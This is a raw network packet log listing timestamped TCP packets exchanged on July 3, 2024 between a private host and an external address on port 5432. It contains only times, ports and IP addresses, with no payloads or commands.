Jul 3, 2024 02:22:31.094201088 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.094213963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.094230890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094271898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.094294071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094304085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094314098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094340086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.094352961 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.094722986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094772100 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.099114895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099124908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099134922 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099147081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099157095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099159956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.099168062 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099178076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.099179029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.099195957 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.099208117 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107429981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107438087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107475042 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107491970 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107506990 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107549906 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107567072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107578993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107605934 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107633114 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107661009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107672930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107681990 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.107707024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.107719898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.114412069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114423037 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114432096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114454985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.114471912 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.114543915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114553928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114563942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114588976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114589930 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.114598989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.114613056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.114634037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.121023893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121083975 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.121103048 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121124029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121150017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.121162891 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.121170044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121205091 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.121227980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121237993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121248007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121258020 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.121279001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.121300936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.126557112 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126574039 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126581907 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126602888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.126621008 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.126636982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126646996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126657009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126667023 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126676083 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.126682997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.126698017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.126718998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.130184889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130194902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130204916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130222082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130227089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.130232096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130242109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130249023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.130251884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.130265951 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.130291939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.135235071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135267973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135312080 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.135339975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135355949 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135365963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135375977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135385036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.135386944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135396957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.135411024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.135435104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.140150070 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140161991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140171051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140211105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.140297890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140307903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140317917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140327930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140337944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.140347004 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.140364885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.140383005 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.144800901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.144809961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.144869089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.144933939 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.144943953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.144953966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.144994020 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.144996881 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.145006895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.145006895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.145015955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.145040035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.145055056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.146594048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.149532080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149542093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149564981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149585009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.149595976 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.149614096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149624109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149648905 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.149655104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.149657011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149667025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149676085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.149689913 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.149702072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.152412891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152422905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152456045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.152462959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152503014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152508974 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.152513027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152524948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152529955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152539015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.152549028 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.152566910 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.152589083 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.156748056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156809092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.156821966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156831980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156841993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156852007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156862020 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156862020 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.156872988 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.156886101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.156908035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.161065102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161082029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161091089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161107063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.161123037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.161214113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161222935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161232948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161252022 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.161274910 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.161277056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161286116 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.161314964 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.166309118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166317940 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166328907 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166338921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166346073 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.166351080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166361094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166364908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.166371107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.166388988 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.166409969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.171684027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.171694040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.171703100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.171721935 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.171729088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.171740055 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.171745062 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.171750069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.171763897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.171787024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.172049046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.172092915 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.188478947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.189831972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.189868927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.189899921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.189922094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.189927101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.189935923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.189963102 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.189974070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190049887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190087080 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190140963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190150976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190161943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190171003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190181017 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190181017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190191984 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190213919 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190819025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190853119 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190871954 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190911055 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190928936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190937996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190947056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.190963984 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.190973997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.191610098 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.198087931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198141098 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.198282957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198292971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198307037 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198318958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198333979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.198357105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.198420048 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198467970 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.198488951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.198529005 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.205354929 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205400944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.205420971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205432892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205445051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205471039 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.205492973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.205580950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205591917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205602884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.205634117 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.205665112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.212240934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212276936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212286949 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212308884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.212318897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.212454081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212466955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212476969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212495089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212502956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.212505102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.212521076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.212542057 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.219813108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.219855070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.219862938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.219871998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.219906092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.220032930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.220041990 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.220052004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.220062017 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.220076084 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.220088959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.223880053 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.223917961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.223926067 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.223954916 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.223964930 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.223984957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.224025011 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.224030018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.224040031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.224067926 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.224078894 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.224118948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.224128962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.224164963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.227904081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.227914095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.227922916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.227946997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.227958918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.227996111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.228024006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.228034019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.228041887 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.228064060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.228105068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.228113890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.228148937 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.231175900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231185913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231194973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231221914 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.231242895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.231339931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231350899 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231359959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231369972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.231379986 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.231404066 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.235858917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.235918999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.235920906 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.235929966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.235956907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.235968113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.235970020 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.236007929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.236140013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.236176968 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.236270905 CEST	5432	49169	116.202.180.70	192.168.2.22
